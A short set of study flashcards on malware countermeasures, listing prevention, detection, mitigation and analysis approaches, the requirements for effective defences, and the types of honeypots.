4. Malware Countermeasures

Question 1

What are the malware countermeasures

Answer 1

-Prevention
- Raise awareness
- Prevent Vulnurabilities
- Define Policies
-Detection
- Host-based
- Network-based
- Honeypots
-Mitigation
- Threat mitigation
- Teardown
-** Malware Analysis**
- Static Analysis
- Dynamic Analysis

Question 2

What are the requirements for effective countermeasures?

Answer 2

• General – able to handle a wide variety of attacks
• Timely – respond quickly to limit number of infected programs/systems
• Resilient – resistant to evasion techniques
• Causing minimal denial-of-service cost – minimal reduction in capacity or service, minimal disruption of normal operation
• Transparent – countermeasure software and devices should not require modification to existing legacy operating systems, application software and hardware
• Global and local coverage – deal with attack sources from the outside as well as inside the enterprise network

Question 3

How to detect infections with known malware

Answer 3

• Host based
• Scan for known malware signatures
• ** Network based**
• Scan for known traffic patterns or C&C server traffic

Question 4

What types of honeypots exist?

Answer 4

Honeypots
- Server or Client-side
- Low or high interaction
- Physical or virtual